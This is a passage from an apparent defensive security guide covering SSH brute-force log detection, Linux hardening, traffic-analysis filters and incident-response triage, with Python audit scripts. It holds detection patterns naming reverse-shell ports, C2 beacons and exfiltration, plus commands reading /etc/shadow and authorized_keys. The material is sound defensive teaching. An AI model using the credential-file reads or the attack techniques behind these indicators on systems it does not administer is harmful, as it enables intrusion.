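            events.append((m.group(1), m.group(2), m.group(3)))
    return events


def top_failed_sources(log: str, n: int = 10) -> List[Tuple[str, int]]:
    """Same idea as grep | awk | sort | uniq -c: failed attempts per source IP."""
    return Counter(ip for outcome, _user, ip in parse(log) if outcome == "Failed").most_common(n)


def brute_force_alerts(log: str, threshold: int = 3) -> List[Tuple[str, int, bool]]:
    """(ip, failure_count, success_after_failures) for each source IP at or above
    the threshold. The bool is the part a SOC cares about most: a success that
    follows a run of failures from the same IP means the guessing worked."""
    failures: Counter = Counter()
    got_in: Dict[str, bool] = {}
    for outcome, _user, ip in parse(log):
        if outcome == "Failed":
            failures[ip] += 1
        elif failures[ip] >= threshold:
            got_in[ip] = True
    return [(ip, count, got_in.get(ip, False))
            for ip, count in failures.most_common() if count >= threshold]


if __name__ == "__main__":
    for ip, count, compromised in brute_force_alerts(SAMPLE_LOG):
        print(f"{ip}: {count} failures, login succeeded afterwards: {compromised}")
```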
Defense

Linux Hardening

Hardening a Linux system means removing attack surface. Everything LinPEAS flags as a finding is something that can be fixed. Use this as a post-deployment checklist.

Think like an attacker: After hardening, run LinPEAS on your own system. If it finds nothing interesting, you did a good job.

User & Access Controls

List all users with login shells
grep -v "/nologin\|/false" /etc/passwd
Lock unused accounts
sudo usermod -L username
Disable root SSH login and password auth (key-based login only)
# /etc/ssh/sshd_config:
PermitRootLogin no
PasswordAuthentication no
sudo systemctl restart sshd
Set strong password policy
sudo apt install libpam-pwquality
# /etc/security/pwquality.conf: minlen=12, dcredit=-1, ucredit=-1
Check for accounts with empty passwords
sudo awk -F: '$2 == "" {print $1}' /etc/shadow
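An sshd_config audit in Python, added here as an example (not the page's own script), that checks the three SSH settings from this section and the hardening checklist. It handles the two parsing rules that trip people up: sshd uses the first occurrence of a keyword, and a commented-out line falls back to the compiled-in default, which for PermitRootLogin is prohibit-password rather than no. The config excerpts are constructed, and the defaults assumed are those of OpenSSH 7.0 and later.

```python
import re
from typing import Dict, List, Tuple

# Constructed sshd_config excerpt resembling a stock Ubuntu install: the checklist's
# settings are commented out or permissive, and a Match block follows.
SAMPLE_SSHD_CONFIG = """\
# This is the sshd server system-wide configuration file.
Include /etc/ssh/sshd_config.d/*.conf
Port 22
#PermitRootLogin prohibit-password
PasswordAuthentication yes
ChallengeResponseAuthentication no
X11Forwarding yes
Match User backup
    PasswordAuthentication no
"""

HARDENED_SSHD_CONFIG = """\
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
"""

# keyword -> (value the checklist requires, value sshd assumes when the line is
# missing or commented out). Defaults assumed from OpenSSH 7.0+ behaviour.
REQUIRED: Dict[str, Tuple[str, str]] = {
    "permitrootlogin": ("no", "prohibit-password"),
    "passwordauthentication": ("no", "yes"),
    "pubkeyauthentication": ("yes", "yes"),
}


def parse_global(config: str) -> Dict[str, str]:
    """Effective global settings, keyword lowercased. Two sshd rules matter here:
    the first occurrence of a keyword wins, and everything after the first Match
    line is conditional, so parsing stops there."""
    settings: Dict[str, str] = {}
    for raw in config.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)  # "Key value" or "Key=value"
        key = parts[0].lower()
        if key == "match":
            break
        value = parts[1].strip().lower() if len(parts) > 1 else ""
        settings.setdefault(key, value)  # first value wins, later repeats are ignored
    return settings


def audit(config: str) -> List[Tuple[str, str, str]]:
    """(keyword, effective value, required value) for every check that fails."""
    settings = parse_global(config)
    findings = []
    for key, (required, default) in REQUIRED.items():
        effective = settings.get(key, default)
        if effective != required:
            findings.append((key, effective, required))
    return findings


if __name__ == "__main__":
    for key, effective, required in audit(SAMPLE_SSHD_CONFIG):
        print(f"{key}: is '{effective}', should be '{required}'")
```

On Ubuntu the Include line at the top pulls in /etc/ssh/sshd_config.d/*.conf before the rest of the file, and because the first value wins those drop-ins override the main file, so feed the script the files concatenated in that order or compare against the output of sshd -T instead.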

File Permissions & SUID

Find non-standard SUID binaries
find / -perm -4000 -type f 2>/dev/null | grep -v "/bin/\|/sbin/\|/usr/bin/\|/usr/sbin/"
Remove SUID from a binary
sudo chmod u-s /path/to/binary
Find world-writable directories
find / -perm -0002 -type d 2>/dev/null | grep -v proc
Secure /tmp (noexec, nosuid)
# In /etc/fstab:
tmpfs /tmp tmpfs defaults,noexec,nosuid,nodev 0 0

Network & Services

List all listening ports and services
ss -tlnp
Disable an unneeded service
sudo systemctl stop servicename
sudo systemctl disable servicename
UFW firewall — allow only SSH + HTTP/S
sudo ufw default deny incoming
sudo ufw allow 22/tcp
sudo ufw allow 80,443/tcp
sudo ufw enable
Install fail2ban (auto-block brute-force)
sudo apt install fail2ban
sudo systemctl enable --now fail2ban

Hardening Checklist

Item | Action | Priority
SSH config | Disable root login, password auth, use key-based auth only | Critical
Unused services | Stop and disable anything not needed | Critical
Firewall | Default deny, whitelist only required ports | Critical
Automatic updates | Enable unattended-upgrades for security patches | High
fail2ban | Install and configure for SSH, HTTP | High
SUID binaries | Audit and remove unnecessary SUID bits | High
Sudo rules | Use least privilege — no NOPASSWD for dangerous binaries | High
Cron jobs | Review all cron jobs, ensure scripts aren't world-writable | Medium
Logging | Enable and centralise system logs, set up alerts | Medium
/tmp noexec | Mount /tmp with noexec,nosuid options | Medium
Defense

Traffic Analysis

Capturing and analysing network traffic to detect attacks, understand protocols, and investigate incidents. Wireshark for GUI analysis; tcpdump for quick CLI captures.

tcpdump

Capture all traffic on interface
sudo tcpdump -i eth0
Capture and save to .pcap file
sudo tcpdump -i eth0 -w capture.pcap
Filter by host
sudo tcpdump -i eth0 host 192.168.1.100
Filter by port
sudo tcpdump -i eth0 port 80
Capture only HTTP GET requests
sudo tcpdump -i eth0 -A 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' | grep "GET\|POST\|Host"
Read a .pcap file
tcpdump -r capture.pcap

Wireshark Filters (Display)

Filter | What It Shows
http | All HTTP traffic
http.request.method == "POST" | POST requests only — find login attempts, form submissions
ip.addr == 10.10.10.1 | All traffic to/from a specific IP
tcp.port == 4444 | Potential reverse shell traffic on port 4444
dns | All DNS queries — spot DNS tunnelling or exfil
ftp | FTP traffic — credentials are cleartext
tcp.flags.syn == 1 && tcp.flags.ack == 0 | SYN packets only — detect port scans
frame contains "password" | Search all frames for the word "password"
!(arp or dns or icmp) | Hide noisy protocols to see actual traffic

What to Look For

Pattern | Possible Indicator
Many SYN packets, no completion | Port scan (nmap -sS)
Sequential port connections | Port scan or automated tool
Large outbound DNS queries | DNS tunnelling / data exfiltration
Cleartext credentials in HTTP/FTP/Telnet | Credential exposure
Outbound connection on unusual port (4444, 1337) | Reverse shell / C2 beacon
Large data transfer to unknown external IP | Data exfiltration
Repeated failed auths from one IP | Brute-force attack
ARP replies without requests | ARP spoofing / MITM attack
Defense

Incident Response

What to do when a system is compromised. Speed and methodology matter — act fast but document everything. The goal is: contain, investigate, recover, learn.

IR Phases: Preparation → Identification → Containment → Eradication → Recovery → Lessons Learned

Initial Triage (Linux)

Who is logged in right now?
w && who && last | head -20
Active network connections
ss -antp | grep ESTABLISHED
Suspicious processes (what's running?)
ps aux | sort -nrk 3 | head -20 # sort by %CPU; -n is needed, otherwise sort compares the numbers as text
Recently created/modified files
find / -mtime -1 -type f 2>/dev/null | grep -v "/proc\|/sys\|/run"
Cron jobs (persistence mechanisms)
crontab -l && cat /etc/crontab && ls /etc/cron.d/
New users added recently
grep -v "nologin\|false" /etc/passwd | awk -F: '{print $1, $3}' | sort -k2 -n
Check ~/.ssh/authorized_keys for backdoors
find /home /root -name "authorized_keys" -exec cat {} \;
Check for unusual SUID files (added by attacker)
find / -perm -4000 -type f -mtime -7 2>/dev/null
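The "new users added recently" triage above and the empty-password check from the hardening section, carried out together in Python (an added example, not the page's own script) over constructed /etc/passwd and /etc/shadow excerpts. Besides listing interactive accounts by UID, it catches the two findings the one-liners do not surface on their own: a second UID-0 account and an account whose shadow password field is empty.

```python
from typing import List, Tuple

# Constructed /etc/passwd and /etc/shadow excerpts. "svc-backup" has UID 0 (a classic
# backdoor account) and "guest" has an empty password field in shadow.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
svc-backup:x:0:0:backup svc:/var/backups:/bin/sh
guest:x:1001:1001::/home/guest:/bin/bash
"""

SAMPLE_SHADOW = """\
root:$6$saltsalt$hashhashhash:19800:0:99999:7:::
daemon:*:19800:0:99999:7:::
www-data:*:19800:0:99999:7:::
alice:$6$saltsalt$otherhash:19800:0:99999:7:::
svc-backup:$6$saltsalt$thirdhash:19800:0:99999:7:::
guest::19800:0:99999:7:::
"""

# Shells that cannot be used to log in interactively (the grep -v list from the page).
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


def login_accounts(passwd: str) -> List[Tuple[str, int, str]]:
    """(name, uid, shell) for every account with an interactive shell, sorted by UID
    so a freshly added account (normally the highest UID) ends up last, matching
    the awk | sort -k2 -n one-liner."""
    rows = []
    for line in passwd.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue  # skip blank or malformed lines
        name, _pw, uid, _gid, _gecos, _home, shell = fields
        if shell not in NOLOGIN_SHELLS:
            rows.append((name, int(uid), shell))
    return sorted(rows, key=lambda row: row[1])


def audit_accounts(passwd: str, shadow: str) -> List[Tuple[str, str]]:
    """(account, finding) pairs for the two checks that matter most in triage."""
    findings = []
    for line in passwd.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, uid = fields[0], int(fields[2])
        if uid == 0 and name != "root":
            findings.append((name, "uid 0 account other than root"))
    for line in shadow.splitlines():
        fields = line.split(":")
        if len(fields) < 2:
            continue
        name, pw_hash = fields[0], fields[1]
        if pw_hash == "":  # the awk '$2 == ""' check from the hardening section
            findings.append((name, "empty password field"))
    return findings


if __name__ == "__main__":
    for name, uid, shell in login_accounts(SAMPLE_PASSWD):
        print(f"{uid:>5}  {name:<12} {shell}")
    for name, finding in audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(f"FINDING: {name}: {finding}")
```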

Memory & Process Investigation

List open files for a suspicious process
lsof -p <PID>
Find process by port
ss -tlnp | grep <port>
What binary is PID running?
ls -la /proc/<PID>/exe
Kill a suspicious process
kill -9 <PID> # Only after you've documented it

Containment Actions

Action | Command / Method
Block attacker IP at firewall | sudo ufw deny from <attacker-ip>
Isolate network (emergency) | sudo ip link set eth0 down — use only if critical
Change all passwords immediately | Start with root, then all service accounts
Revoke SSH keys | Clear authorized_keys, rotate all key pairs
Preserve evidence | Snapshot VM before cleanup; copy logs off-system first
Check for persistence | Cron jobs, services, authorized_keys, .bashrc, SUID
Evidence first, then cleanup. Never wipe a system before taking a snapshot or copying logs. You need the evidence to understand what happened and prevent it from happening again.